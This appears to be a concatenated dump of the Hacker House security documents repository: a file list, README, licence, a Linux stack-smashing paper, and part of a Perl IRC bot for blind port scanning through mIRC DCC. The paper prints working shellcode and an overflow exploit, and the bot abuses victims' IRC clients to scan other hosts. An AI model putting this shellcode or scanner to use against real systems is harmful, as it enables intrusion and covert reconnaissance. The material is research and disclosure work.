├── CryptoPartyLondon-DogAteMyCryptoKeys.ppt ├── DogAteMyCryptoKeysv2.pdf ├── EquationGroupUNIX.xlsx ├── HackerHouse_A_Blockchain_Quest.pdf ├── HackerHouse_iOS_IdentificationChart_A0.pdf ├── HackerHouse_iOS_IdentificationChart_A1.pdf ├── HackerHouse_iOS_IdentificationChart_WebGraphic.pdf ├── Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx ├── LICENSE.txt ├── Pyongyang_2407_HackerHouse_dc526.pdf ├── README.md ├── Snoopcon_SpacePony.pdf ├── VAstacksmash.txt ├── apple_A6_decap.zip ├── learn_morse.pdf └── tcp_blind_scanning_via_mIRC.txt /CryptoPartyLondon-DogAteMyCryptoKeys.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/CryptoPartyLondon-DogAteMyCryptoKeys.ppt -------------------------------------------------------------------------------- /DogAteMyCryptoKeysv2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/DogAteMyCryptoKeysv2.pdf -------------------------------------------------------------------------------- /EquationGroupUNIX.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/EquationGroupUNIX.xlsx -------------------------------------------------------------------------------- /HackerHouse_A_Blockchain_Quest.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_A_Blockchain_Quest.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_A0.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_A0.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_A1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_A1.pdf -------------------------------------------------------------------------------- /HackerHouse_iOS_IdentificationChart_WebGraphic.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/HackerHouse_iOS_IdentificationChart_WebGraphic.pdf -------------------------------------------------------------------------------- /Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Attribution-NonCommercial-NoDerivatives 4.0 International 2 | 3 | ======================================================================= 4 | 5 | Creative Commons Corporation ("Creative Commons") is not a law firm and 6 | does not provide legal services or legal advice. Distribution of 7 | Creative Commons public licenses does not create a lawyer-client or 8 | other relationship. Creative Commons makes its licenses and related 9 | information available on an "as-is" basis. Creative Commons gives no 10 | warranties regarding its licenses, any material licensed under their 11 | terms and conditions, or any related information. Creative Commons 12 | disclaims all liability for damages resulting from their use to the 13 | fullest extent possible. 14 | 15 | Using Creative Commons Public Licenses 16 | 17 | Creative Commons public licenses provide a standard set of terms and 18 | conditions that creators and other rights holders may use to share 19 | original works of authorship and other material subject to copyright 20 | and certain other rights specified in the public license below. The 21 | following considerations are for informational purposes only, are not 22 | exhaustive, and do not form part of our licenses. 23 | 24 | Considerations for licensors: Our public licenses are 25 | intended for use by those authorized to give the public 26 | permission to use material in ways otherwise restricted by 27 | copyright and certain other rights. Our licenses are 28 | irrevocable. Licensors should read and understand the terms 29 | and conditions of the license they choose before applying it. 30 | Licensors should also secure all rights necessary before 31 | applying our licenses so that the public can reuse the 32 | material as expected. Licensors should clearly mark any 33 | material not subject to the license. This includes other CC- 34 | licensed material, or material used under an exception or 35 | limitation to copyright. More considerations for licensors: 36 | wiki.creativecommons.org/Considerations_for_licensors 37 | 38 | Considerations for the public: By using one of our public 39 | licenses, a licensor grants the public permission to use the 40 | licensed material under specified terms and conditions. If 41 | the licensor's permission is not necessary for any reason--for 42 | example, because of any applicable exception or limitation to 43 | copyright--then that use is not regulated by the license. Our 44 | licenses grant only permissions under copyright and certain 45 | other rights that a licensor has authority to grant. Use of 46 | the licensed material may still be restricted for other 47 | reasons, including because others have copyright or other 48 | rights in the material. A licensor may make special requests, 49 | such as asking that all changes be marked or described. 50 | Although not required by our licenses, you are encouraged to 51 | respect those requests where reasonable. More considerations 52 | for the public: 53 | wiki.creativecommons.org/Considerations_for_licensees 54 | 55 | ======================================================================= 56 | 57 | Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 58 | International Public License 59 | 60 | By exercising the Licensed Rights (defined below), You accept and agree 61 | to be bound by the terms and conditions of this Creative Commons 62 | Attribution-NonCommercial-NoDerivatives 4.0 International Public 63 | License ("Public License"). To the extent this Public License may be 64 | interpreted as a contract, You are granted the Licensed Rights in 65 | consideration of Your acceptance of these terms and conditions, and the 66 | Licensor grants You such rights in consideration of benefits the 67 | Licensor receives from making the Licensed Material available under 68 | these terms and conditions. 69 | 70 | 71 | Section 1 -- Definitions. 72 | 73 | a. Adapted Material means material subject to Copyright and Similar 74 | Rights that is derived from or based upon the Licensed Material 75 | and in which the Licensed Material is translated, altered, 76 | arranged, transformed, or otherwise modified in a manner requiring 77 | permission under the Copyright and Similar Rights held by the 78 | Licensor. For purposes of this Public License, where the Licensed 79 | Material is a musical work, performance, or sound recording, 80 | Adapted Material is always produced where the Licensed Material is 81 | synched in timed relation with a moving image. 82 | 83 | b. Copyright and Similar Rights means copyright and/or similar rights 84 | closely related to copyright including, without limitation, 85 | performance, broadcast, sound recording, and Sui Generis Database 86 | Rights, without regard to how the rights are labeled or 87 | categorized. For purposes of this Public License, the rights 88 | specified in Section 2(b)(1)-(2) are not Copyright and Similar 89 | Rights. 90 | 91 | c. Effective Technological Measures means those measures that, in the 92 | absence of proper authority, may not be circumvented under laws 93 | fulfilling obligations under Article 11 of the WIPO Copyright 94 | Treaty adopted on December 20, 1996, and/or similar international 95 | agreements. 96 | 97 | d. Exceptions and Limitations means fair use, fair dealing, and/or 98 | any other exception or limitation to Copyright and Similar Rights 99 | that applies to Your use of the Licensed Material. 100 | 101 | e. Licensed Material means the artistic or literary work, database, 102 | or other material to which the Licensor applied this Public 103 | License. 104 | 105 | f. Licensed Rights means the rights granted to You subject to the 106 | terms and conditions of this Public License, which are limited to 107 | all Copyright and Similar Rights that apply to Your use of the 108 | Licensed Material and that the Licensor has authority to license. 109 | 110 | g. Licensor means the individual(s) or entity(ies) granting rights 111 | under this Public License. 112 | 113 | h. NonCommercial means not primarily intended for or directed towards 114 | commercial advantage or monetary compensation. For purposes of 115 | this Public License, the exchange of the Licensed Material for 116 | other material subject to Copyright and Similar Rights by digital 117 | file-sharing or similar means is NonCommercial provided there is 118 | no payment of monetary compensation in connection with the 119 | exchange. 120 | 121 | i. Share means to provide material to the public by any means or 122 | process that requires permission under the Licensed Rights, such 123 | as reproduction, public display, public performance, distribution, 124 | dissemination, communication, or importation, and to make material 125 | available to the public including in ways that members of the 126 | public may access the material from a place and at a time 127 | individually chosen by them. 128 | 129 | j. Sui Generis Database Rights means rights other than copyright 130 | resulting from Directive 96/9/EC of the European Parliament and of 131 | the Council of 11 March 1996 on the legal protection of databases, 132 | as amended and/or succeeded, as well as other essentially 133 | equivalent rights anywhere in the world. 134 | 135 | k. You means the individual or entity exercising the Licensed Rights 136 | under this Public License. Your has a corresponding meaning. 137 | 138 | 139 | Section 2 -- Scope. 140 | 141 | a. License grant. 142 | 143 | 1. Subject to the terms and conditions of this Public License, 144 | the Licensor hereby grants You a worldwide, royalty-free, 145 | non-sublicensable, non-exclusive, irrevocable license to 146 | exercise the Licensed Rights in the Licensed Material to: 147 | 148 | a. reproduce and Share the Licensed Material, in whole or 149 | in part, for NonCommercial purposes only; and 150 | 151 | b. produce and reproduce, but not Share, Adapted Material 152 | for NonCommercial purposes only. 153 | 154 | 2. Exceptions and Limitations. For the avoidance of doubt, where 155 | Exceptions and Limitations apply to Your use, this Public 156 | License does not apply, and You do not need to comply with 157 | its terms and conditions. 158 | 159 | 3. Term. The term of this Public License is specified in Section 160 | 6(a). 161 | 162 | 4. Media and formats; technical modifications allowed. The 163 | Licensor authorizes You to exercise the Licensed Rights in 164 | all media and formats whether now known or hereafter created, 165 | and to make technical modifications necessary to do so. The 166 | Licensor waives and/or agrees not to assert any right or 167 | authority to forbid You from making technical modifications 168 | necessary to exercise the Licensed Rights, including 169 | technical modifications necessary to circumvent Effective 170 | Technological Measures. For purposes of this Public License, 171 | simply making modifications authorized by this Section 2(a) 172 | (4) never produces Adapted Material. 173 | 174 | 5. Downstream recipients. 175 | 176 | a. Offer from the Licensor -- Licensed Material. Every 177 | recipient of the Licensed Material automatically 178 | receives an offer from the Licensor to exercise the 179 | Licensed Rights under the terms and conditions of this 180 | Public License. 181 | 182 | b. No downstream restrictions. You may not offer or impose 183 | any additional or different terms or conditions on, or 184 | apply any Effective Technological Measures to, the 185 | Licensed Material if doing so restricts exercise of the 186 | Licensed Rights by any recipient of the Licensed 187 | Material. 188 | 189 | 6. No endorsement. Nothing in this Public License constitutes or 190 | may be construed as permission to assert or imply that You 191 | are, or that Your use of the Licensed Material is, connected 192 | with, or sponsored, endorsed, or granted official status by, 193 | the Licensor or others designated to receive attribution as 194 | provided in Section 3(a)(1)(A)(i). 195 | 196 | b. Other rights. 197 | 198 | 1. Moral rights, such as the right of integrity, are not 199 | licensed under this Public License, nor are publicity, 200 | privacy, and/or other similar personality rights; however, to 201 | the extent possible, the Licensor waives and/or agrees not to 202 | assert any such rights held by the Licensor to the limited 203 | extent necessary to allow You to exercise the Licensed 204 | Rights, but not otherwise. 205 | 206 | 2. Patent and trademark rights are not licensed under this 207 | Public License. 208 | 209 | 3. To the extent possible, the Licensor waives any right to 210 | collect royalties from You for the exercise of the Licensed 211 | Rights, whether directly or through a collecting society 212 | under any voluntary or waivable statutory or compulsory 213 | licensing scheme. In all other cases the Licensor expressly 214 | reserves any right to collect such royalties, including when 215 | the Licensed Material is used other than for NonCommercial 216 | purposes. 217 | 218 | 219 | Section 3 -- License Conditions. 220 | 221 | Your exercise of the Licensed Rights is expressly made subject to the 222 | following conditions. 223 | 224 | a. Attribution. 225 | 226 | 1. If You Share the Licensed Material, You must: 227 | 228 | a. retain the following if it is supplied by the Licensor 229 | with the Licensed Material: 230 | 231 | i. identification of the creator(s) of the Licensed 232 | Material and any others designated to receive 233 | attribution, in any reasonable manner requested by 234 | the Licensor (including by pseudonym if 235 | designated); 236 | 237 | ii. a copyright notice; 238 | 239 | iii. a notice that refers to this Public License; 240 | 241 | iv. a notice that refers to the disclaimer of 242 | warranties; 243 | 244 | v. a URI or hyperlink to the Licensed Material to the 245 | extent reasonably practicable; 246 | 247 | b. indicate if You modified the Licensed Material and 248 | retain an indication of any previous modifications; and 249 | 250 | c. indicate the Licensed Material is licensed under this 251 | Public License, and include the text of, or the URI or 252 | hyperlink to, this Public License. 253 | 254 | For the avoidance of doubt, You do not have permission under 255 | this Public License to Share Adapted Material. 256 | 257 | 2. You may satisfy the conditions in Section 3(a)(1) in any 258 | reasonable manner based on the medium, means, and context in 259 | which You Share the Licensed Material. For example, it may be 260 | reasonable to satisfy the conditions by providing a URI or 261 | hyperlink to a resource that includes the required 262 | information. 263 | 264 | 3. If requested by the Licensor, You must remove any of the 265 | information required by Section 3(a)(1)(A) to the extent 266 | reasonably practicable. 267 | 268 | 269 | Section 4 -- Sui Generis Database Rights. 270 | 271 | Where the Licensed Rights include Sui Generis Database Rights that 272 | apply to Your use of the Licensed Material: 273 | 274 | a. for the avoidance of doubt, Section 2(a)(1) grants You the right 275 | to extract, reuse, reproduce, and Share all or a substantial 276 | portion of the contents of the database for NonCommercial purposes 277 | only and provided You do not Share Adapted Material; 278 | 279 | b. if You include all or a substantial portion of the database 280 | contents in a database in which You have Sui Generis Database 281 | Rights, then the database in which You have Sui Generis Database 282 | Rights (but not its individual contents) is Adapted Material; and 283 | 284 | c. You must comply with the conditions in Section 3(a) if You Share 285 | all or a substantial portion of the contents of the database. 286 | 287 | For the avoidance of doubt, this Section 4 supplements and does not 288 | replace Your obligations under this Public License where the Licensed 289 | Rights include other Copyright and Similar Rights. 290 | 291 | 292 | Section 5 -- Disclaimer of Warranties and Limitation of Liability. 293 | 294 | a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE 295 | EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS 296 | AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF 297 | ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS, 298 | IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION, 299 | WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR 300 | PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS, 301 | ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT 302 | KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT 303 | ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU. 304 | 305 | b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE 306 | TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, 307 | NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT, 308 | INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES, 309 | COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR 310 | USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN 311 | ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR 312 | DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR 313 | IN PART, THIS LIMITATION MAY NOT APPLY TO YOU. 314 | 315 | c. The disclaimer of warranties and limitation of liability provided 316 | above shall be interpreted in a manner that, to the extent 317 | possible, most closely approximates an absolute disclaimer and 318 | waiver of all liability. 319 | 320 | 321 | Section 6 -- Term and Termination. 322 | 323 | a. This Public License applies for the term of the Copyright and 324 | Similar Rights licensed here. However, if You fail to comply with 325 | this Public License, then Your rights under this Public License 326 | terminate automatically. 327 | 328 | b. Where Your right to use the Licensed Material has terminated under 329 | Section 6(a), it reinstates: 330 | 331 | 1. automatically as of the date the violation is cured, provided 332 | it is cured within 30 days of Your discovery of the 333 | violation; or 334 | 335 | 2. upon express reinstatement by the Licensor. 336 | 337 | For the avoidance of doubt, this Section 6(b) does not affect any 338 | right the Licensor may have to seek remedies for Your violations 339 | of this Public License. 340 | 341 | c. For the avoidance of doubt, the Licensor may also offer the 342 | Licensed Material under separate terms or conditions or stop 343 | distributing the Licensed Material at any time; however, doing so 344 | will not terminate this Public License. 345 | 346 | d. Sections 1, 5, 6, 7, and 8 survive termination of this Public 347 | License. 348 | 349 | 350 | Section 7 -- Other Terms and Conditions. 351 | 352 | a. The Licensor shall not be bound by any additional or different 353 | terms or conditions communicated by You unless expressly agreed. 354 | 355 | b. Any arrangements, understandings, or agreements regarding the 356 | Licensed Material not stated herein are separate from and 357 | independent of the terms and conditions of this Public License. 358 | 359 | 360 | Section 8 -- Interpretation. 361 | 362 | a. For the avoidance of doubt, this Public License does not, and 363 | shall not be interpreted to, reduce, limit, restrict, or impose 364 | conditions on any use of the Licensed Material that could lawfully 365 | be made without permission under this Public License. 366 | 367 | b. To the extent possible, if any provision of this Public License is 368 | deemed unenforceable, it shall be automatically reformed to the 369 | minimum extent necessary to make it enforceable. If the provision 370 | cannot be reformed, it shall be severed from this Public License 371 | without affecting the enforceability of the remaining terms and 372 | conditions. 373 | 374 | c. No term or condition of this Public License will be waived and no 375 | failure to comply consented to unless expressly agreed to by the 376 | Licensor. 377 | 378 | d. Nothing in this Public License constitutes or may be interpreted 379 | as a limitation upon, or waiver of, any privileges and immunities 380 | that apply to the Licensor or You, including from the legal 381 | processes of any jurisdiction or authority. 382 | 383 | ======================================================================= 384 | 385 | Creative Commons is not a party to its public 386 | licenses. Notwithstanding, Creative Commons may elect to apply one of 387 | its public licenses to material it publishes and in those instances 388 | will be considered the “Licensor.” The text of the Creative Commons 389 | public licenses is dedicated to the public domain under the CC0 Public 390 | Domain Dedication. Except for the limited purpose of indicating that 391 | material is shared under a Creative Commons public license or as 392 | otherwise permitted by the Creative Commons policies published at 393 | creativecommons.org/policies, Creative Commons does not authorize the 394 | use of the trademark "Creative Commons" or any other trademark or logo 395 | of Creative Commons without its prior written consent including, 396 | without limitation, in connection with any unauthorized modifications 397 | to any of its public licenses or any other arrangements, 398 | understandings, or agreements concerning use of licensed material. For 399 | the avoidance of doubt, this paragraph does not form part of the 400 | public licenses. 401 | 402 | Creative Commons may be contacted at creativecommons.org. 403 | 404 | -------------------------------------------------------------------------------- /Pyongyang_2407_HackerHouse_dc526.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Pyongyang_2407_HackerHouse_dc526.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Documents 2 | 3 | Presentations, documents and other files released from the team at Hacker House. 4 | 5 | | Filename | Description | 6 | | :---: | :--- | 7 | |*apple_A6_decap.zip*| Apple A6 CPU de-capped high resolution photos | 8 | |*CryptoPartyLondon-DogAteMyCryptoKeys.ppt* | Dog Ate My Crypto Keys (cryptoparty LDN) | 9 | |*DogAteMyCryptoKeysv2.pdf* | Dog Ate My Crypto Keys (v2) | 10 | |*EquationGroupUNIX.xlsx*| Equation Group UNIX tools identified from leaks | 11 | |*HackerHouse_A_Blockchain_Quest.pdf*| Blockchain & Cryptocurrency presentation | 12 | |*HackerHouse_iOS_IdentificationChart_A0.pdf* | Apple iDevice identification poster (print A0 size) | 13 | |*HackerHouse_iOS_IdentificationChart_A1.pdf* | Apple iDevice identification poster (print A1 size) | 14 | |*HackerHouse_iOS_IdentificationChart_WebGraphic.pdf* | Apple iDevice identification poster (web graphic) | 15 | |*Hacking_Embedded_Devices-HackerFantastic-uncon18.pptx*| Embedded Device Hacking uncon18 | 16 | |*learn_morse.pdf*| Morse code cheat sheet for amateur radio | 17 | |*Pyongyang_2407_HackerHouse_dc526.pdf*| Pyongyang 2407 Android ROM hacking (dc526 meetup) | 18 | |*Snoopcon_SpacePony.pdf* | Space Pony - riding exploits into orbit (snoopcon) | 19 | |*tcp_blind_scanning_via_mIRC.txt*| TCP/IP blind port scanning attack | 20 | |*VAstacksmash.txt*| Virtual Address randomization exploitation paper | 21 | 22 | These files are available under a Attribution-NonCommercial-NoDerivatives 4.0 International license. 23 | 24 | -------------------------------------------------------------------------------- /Snoopcon_SpacePony.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/Snoopcon_SpacePony.pdf -------------------------------------------------------------------------------- /VAstacksmash.txt: -------------------------------------------------------------------------------- 1 | Linux Virtual Addresses Exploitation 2 | ==================================== 3 | Linux kernel recently incorporated a protection which randomizes the stack making exploitation of 4 | stack based overflows more difficult. I present here an attack which works on exploiting static 5 | addresses in Linux. You should be familiar with standard stack smashing before attempting this 6 | paper. 7 | 8 | Virtual Addresses 9 | ================= 10 | Lets take a look at two instances of the same program which is a simple loop() to check maps. 11 | 12 | prdelka@gentoo ~ $ cat /proc/5415/maps 13 | 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env 14 | 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env 15 | b7e02000-b7f0b000 r-xp 00000000 03:01 229995 /lib/libc-2.3.5.so 16 | b7f0b000-b7f0c000 ---p 00109000 03:01 229995 /lib/libc-2.3.5.so 17 | b7f0c000-b7f0d000 r--p 00109000 03:01 229995 /lib/libc-2.3.5.so 18 | b7f0d000-b7f10000 rw-p 0010a000 03:01 229995 /lib/libc-2.3.5.so 19 | b7f10000-b7f13000 rw-p b7f10000 00:00 0 20 | b7f1f000-b7f34000 r-xp 00000000 03:01 230174 /lib/ld-2.3.5.so 21 | b7f34000-b7f35000 r--p 00014000 03:01 230174 /lib/ld-2.3.5.so 22 | b7f35000-b7f36000 rw-p 00015000 03:01 230174 /lib/ld-2.3.5.so 23 | bfd1f000-bfd34000 rw-p bfd1f000 00:00 0 [stack] 24 | ffffe000-fffff000 ---p 00000000 00:00 0 [vdso] 25 | 26 | prdelka@gentoo ~ $ cat /proc/5426/maps 27 | 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env 28 | 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env 29 | b7df6000-b7eff000 r-xp 00000000 03:01 229995 /lib/libc-2.3.5.so 30 | b7eff000-b7f00000 ---p 00109000 03:01 229995 /lib/libc-2.3.5.so 31 | b7f00000-b7f01000 r--p 00109000 03:01 229995 /lib/libc-2.3.5.so 32 | b7f01000-b7f04000 rw-p 0010a000 03:01 229995 /lib/libc-2.3.5.so 33 | b7f04000-b7f07000 rw-p b7f04000 00:00 0 34 | b7f13000-b7f28000 r-xp 00000000 03:01 230174 /lib/ld-2.3.5.so 35 | b7f28000-b7f29000 r--p 00014000 03:01 230174 /lib/ld-2.3.5.so 36 | b7f29000-b7f2a000 rw-p 00015000 03:01 230174 /lib/ld-2.3.5.so 37 | bfc0e000-bfc28000 rw-p bfc0e000 00:00 0 [stack] 38 | ffffe000-fffff000 ---p 00000000 00:00 0 [vdso] 39 | 40 | We can see the stack is randomized along with the libaries making ret-into-libc 41 | difficult. However we are left with one constant between the two programs. 42 | 43 | 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env 44 | 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env 45 | 46 | So we must find our return address here. Let us take a look now at a vulnerable program. 47 | 48 | prdelka@gentoo ~ $ cat bug.c 49 | #include 50 | 51 | int main(int argc,char* argv[]){ 52 | char buffer[100]; 53 | strcpy(buffer,argv[1]); 54 | return 1; 55 | } 56 | 57 | We will now overflow the stack and look at the registers. using ./bug `perl -e 'print "A"x5000'` 58 | and GDB. 59 | 60 | Program received signal SIGSEGV, Segmentation fault. 61 | Error while running hook_stop: 62 | Invalid type combination in ordering comparison. 63 | 0x41414141 in ?? () 64 | gdb> i r 65 | eax 0x1 0x1 66 | ecx 0xffffe21d 0xffffe21d 67 | edx 0xbfa0b71b 0xbfa0b71b 68 | ebx 0xb7ee6ff4 0xb7ee6ff4 69 | esp 0xbfa08630 0xbfa08630 70 | ebp 0x41414141 0x41414141 71 | esi 0xb7f0dc80 0xb7f0dc80 72 | edi 0xbfa08674 0xbfa08674 73 | eip 0x41414141 0x41414141 74 | eflags 0x10246 0x10246 75 | cs 0x73 0x73 76 | ss 0x7b 0x7b 77 | ds 0x7b 0x7b 78 | es 0x7b 0x7b 79 | fs 0x0 0x0 80 | gs 0x0 0x0 81 | 82 | If we examine more closely we can find the randomized address of the environment pointer in EDX which 83 | is always pointing to our environment variables in example vulnerability, this is often the case in 84 | regular command line arguement overflows. 85 | 86 | gdb> x/s $edx 87 | 0xbfa0b71b: "MANPATH=", 88 | 89 | To exploit the program, we must find a way to "call $edx", "jmp $edx" or "push $edx, retn". We can find 90 | a usable return address in our static area of memory from the ELF binary, we use ndisasm and grep. 91 | 92 | prdelka@gentoo ~ $ ./ndisasm bug | grep "call dx" 93 | 00000338 FFD2 call dx 94 | 000016F3 FFD2 call dx 95 | 96 | so we know the base address of the ELF binary is 08048000, if we add the offset 0x338 we have a return 97 | address of 0x8048338! If we examine this return address in GDB we see the following. 98 | 99 | 0x8048338 <__do_global_dtors_aux+40>: call *%edx 100 | 101 | Exploitation 102 | ============ 103 | To exploit the bug we will place our payload in the first environment variable, to find this we run the 104 | 'env' command. 105 | 106 | prdelka@gentoo ~ $ env 107 | MANPATH=/usr/local/share/man:/usr/share/man:/usr/share/binutils-data/i686-pc-linux-gnu/2.15.92.0.2 108 | /man:/usr/share/gcc-data/i686-pc-linux-gnu/3.3.6/man:/usr/qt/3/doc/man 109 | 110 | We will now put our shellcode in this environment variable. 111 | 112 | prdelka@gentoo ~ $ export MANPATH=`perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68";print "//sh";print "\x68";print "/bin";print "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";'` 113 | 114 | We can now exploit our application with our return address we found previously. 115 | 116 | prdelka@gentoo ~ $ uname -a 117 | Linux gentoo 2.6.12-gentoo-r10 #2 Tue Sep 13 00:33:15 IDT 2005 i686 Mobile Intel(R) Celeron(R) CPU 1.70GHz GenuineIntel GNU/Linux 118 | prdelka@gentoo ~ $ ./bug `perl -e 'print "\x90"x124;print "\x38\x83\x04\x08";'` 119 | sh-3.00$ 120 | 121 | 122 | -------------------------------------------------------------------------------- /apple_A6_decap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/apple_A6_decap.zip -------------------------------------------------------------------------------- /learn_morse.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerhouse-opensource/documents/f8f0945a0e2106fb1fefead88d7bc0deaadc694b/learn_morse.pdf -------------------------------------------------------------------------------- /tcp_blind_scanning_via_mIRC.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # (IRC)DCC connect() blind port scanner 3 | # ===================================== 4 | # This IRC bot implements a method to blind port 5 | # scan a host using DCC. It works specifically 6 | # against win32 IRC clients, namely mIRC. The 7 | # attack relies on the fact that mIRC uses sequential 8 | # port numbers when estabilishing DCC connections, 9 | # incrementing only on a successful connect. An 10 | # example of the implementation is shown below. 11 | # 12 | # _ _ 13 | # | |DCC | | 14 | # mIRC|_|<-->|_|Attacker 15 | # Src:1026 16 | # 17 | # 1. First we send a DCC request to the mIRC user. 18 | # A listener on the attackers system learns the 19 | # source port of the connecting DCC. 20 | # _ 21 | # | | 194.217.240.73 22 | # |_| Destination port 2913 23 | # / 24 | # _/ _ 25 | # | | | | 26 | # mIRC|_|<---|_|Attacker 27 | # Src:1027 28 | # 29 | # 2. Then we send a spoofed DCC request (appearing 30 | # to come from the Destination we intend to scan) 31 | # to the mIRC client. 32 | # _ _ 33 | # | |DCC | | 34 | # mIRC|_|<-->|_|Attacker 35 | # Src:1027 36 | # 37 | # 3. After waiting a short while for the mIRC client 38 | # to either connect or timeout the connection to 39 | # destination. We send another DCC request which 40 | # connects to our listener. In our example, mIRC 41 | # has not incremented its source port since phase 1 42 | # of the attack, so we know the port is closed. 43 | # 44 | # It is worth noting at this point that the ideal 45 | # candidate is a mIRC client with autoget/autochat 46 | # enabled that isnt actively DCCing. DCC/port timeouts 47 | # can provide false positives. The following behaviourly 48 | # traites of microsoft systems were noticed which 49 | # could affect the results of this scan. 50 | # 51 | # WinXP SP2(eng) has 1025 listening by default. 52 | # Win2003 Enterprise(eng) has 1025 & 1026 listening default. 53 | # Win2000 Adv. server(eng) has 1025,1026,1027,1028,1031,1036 54 | # 1037,1038,1039 listening by default. 55 | # Win2000 Professional has 1025 listening by default. 56 | # 57 | # This attack was tested extensively against a WinXP SP2(eng) 58 | # mIRC client with Autoget/Autochat enabled and file ignore 59 | # switched off. It obtained accurate scanning results. 60 | # This technique can also be used to scan behind NAT. 61 | # 62 | # To use this bot, the following command is used 63 | # from an IRC channel. 64 | # 65 | # !scan 192.168.0.1 65535 mircuser 1 66 | # Dest IP Port Nick 1/2(CHAT/SEND) 67 | # 68 | # Example. 69 | # < ATTACKER> !scan 192.168.0.1 22 mircsux 2 70 | # < mIRCDCCx> [ (IRC)DCC connect() blind port scanner 71 | # < mIRCDCCx> [ checking 192.168.0.1 (22/TCP) from mircsux using SEND 72 | # < mIRCDCCx> [ port is open (LST:1024 SRC:1027 RST:3) 73 | # < mIRCDCCx> [ done. 74 | # 75 | # This was not set out to be the best implementation 76 | # of the attack. Just a conceptual tool that such an 77 | # attack vector exists. 78 | # 79 | # - prdelka 80 | use IO::Socket; 81 | 82 | ################# 83 | # Configuration # 84 | ################# 85 | 86 | my $ircserver = "irc.YOURIRCD.net"; 87 | my $nickname = "mIRCDCCx"; 88 | my $admin_channel = "#DCC-SCANNER"; 89 | my $listener_ip = '123.123.123.123'; 90 | my $listner_port = 10000; 91 | my $dcc_timeout = 40; 92 | 93 | ############################## 94 | #!!#DO NOT EDIT BELOW HERE#!!# 95 | ############################## 96 | print "[ (IRC)DCC connect() blind port scanner robot running\n"; 97 | if($pid = fork()) #parent returns PID (parent is the IRC bot) (child is a listener for DCC accepts) 98 | { 99 | ############################# 100 | # connect to the IRC server # 101 | # and join admin channel # 102 | ############################# 103 | 104 | $sock = IO::Socket::INET->new( 105 | PeerAddr => $ircserver, 106 | PeerPort => 6667, 107 | Proto => 'tcp' ) or die "could not make the connection"; 108 | 109 | while($line = <$sock>){ 110 | if($line =~ /(NOTICE AUTH).*(checking ident)/i){ 111 | print $sock "NICK $nickname\nUSER username 0 0 :email\@address\n"; 112 | last; 113 | } 114 | } 